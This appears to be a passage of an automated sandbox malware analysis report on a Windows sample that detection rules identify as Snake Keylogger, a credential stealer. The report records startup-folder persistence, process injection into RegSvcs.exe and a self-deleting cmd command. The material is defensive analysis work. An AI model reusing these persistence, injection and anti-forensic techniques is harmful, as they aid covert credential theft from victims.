Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_024CC1A0	3_2_024CC1A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_024CC760	3_2_024CC760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_024CC480	3_2_024CC480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_024CB4A0	3_2_024CB4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_024CCA40	3_2_024CCA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_024C4AE8	3_2_024C4AE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_024CBBE0	3_2_024CBBE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_024C9858	3_2_024C9858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_024C6880	3_2_024C6880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_024CBEC0	3_2_024CBEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_024CC198	3_2_024CC198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_024CC753	3_2_024CC753
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_024CC470	3_2_024CC470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_024CB4F3	3_2_024CB4F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_024C3573	3_2_024C3573
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_024CCA33	3_2_024CCA33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_024C4AD9	3_2_024C4AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_024CBEBB	3_2_024CBEBB
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 6_2_01903F10	6_2_01903F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_012B6108	7_2_012B6108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_012BC190	7_2_012BC190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_012BB328	7_2_012BB328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_012BC470	7_2_012BC470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_012B6730	7_2_012B6730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_012BC752	7_2_012BC752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_012B9858	7_2_012B9858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_012BBBD2	7_2_012BBBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_012BCA32	7_2_012BCA32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_012B4AD9	7_2_012B4AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_012BBEB0	7_2_012BBEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_012B3572	7_2_012B3572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_012BB4F2	7_2_012BB4F2

Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: String function: 001E8900 appears 42 times
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: String function: 001E0AE3 appears 70 times
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: String function: 001C7DE1 appears 35 times
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: String function: 00AC0AE3 appears 70 times
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: String function: 00AA7DE1 appears 36 times
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: String function: 00AC8900 appears 42 times

Source: MBOaS3GRtF.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 6.2.supergroup.exe.1890000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.supergroup.exe.1890000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.supergroup.exe.1890000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.supergroup.exe.1890000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 6.2.supergroup.exe.1890000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.supergroup.exe.1890000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.supergroup.exe.1890000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.supergroup.exe.1890000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.supergroup.exe.32a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.supergroup.exe.32a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.supergroup.exe.32a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.supergroup.exe.32a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.supergroup.exe.32a0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.supergroup.exe.32a0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.supergroup.exe.32a0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.supergroup.exe.32a0000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000003.00000002.1569174636.0000000000622000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.1569174636.0000000000622000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: supergroup.exe PID: 7744, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: supergroup.exe PID: 7744, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 7764, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7764, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: supergroup.exe PID: 8100, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: supergroup.exe PID: 8100, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@20/7@2/2

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00B0A06A GetLastError,FormatMessageW,

0_2_00B0A06A

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AF81CB AdjustTokenPrivileges,CloseHandle,	0_2_00AF81CB
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AF87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_00AF87E1
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_002181CB AdjustTokenPrivileges,CloseHandle,	2_2_002181CB
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_002187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	2_2_002187E1

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00B0B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00B0B3FB

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00B1EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00B1EE0D

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00B183BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00B183BB

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00AA4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00AA4E89

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

File created: C:\Users\user\AppData\Local\Anglophile

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_03

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

File created: C:\Users\user\AppData\Local\Temp\aut5438.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\supergroup.vbs"

Source: MBOaS3GRtF.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MBOaS3GRtF.exe	Virustotal: Detection: 69%
Source: MBOaS3GRtF.exe	ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

File read: C:\Users\user\Desktop\MBOaS3GRtF.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\MBOaS3GRtF.exe "C:\Users\user\Desktop\MBOaS3GRtF.exe"
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Process created: C:\Users\user\AppData\Local\Anglophile\supergroup.exe "C:\Users\user\Desktop\MBOaS3GRtF.exe"
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\MBOaS3GRtF.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\supergroup.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Anglophile\supergroup.exe "C:\Users\user\AppData\Local\Anglophile\supergroup.exe"
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Anglophile\supergroup.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Process created: C:\Users\user\AppData\Local\Anglophile\supergroup.exe "C:\Users\user\Desktop\MBOaS3GRtF.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\MBOaS3GRtF.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Anglophile\supergroup.exe "C:\Users\user\AppData\Local\Anglophile\supergroup.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Anglophile\supergroup.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3	Jump to behavior

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
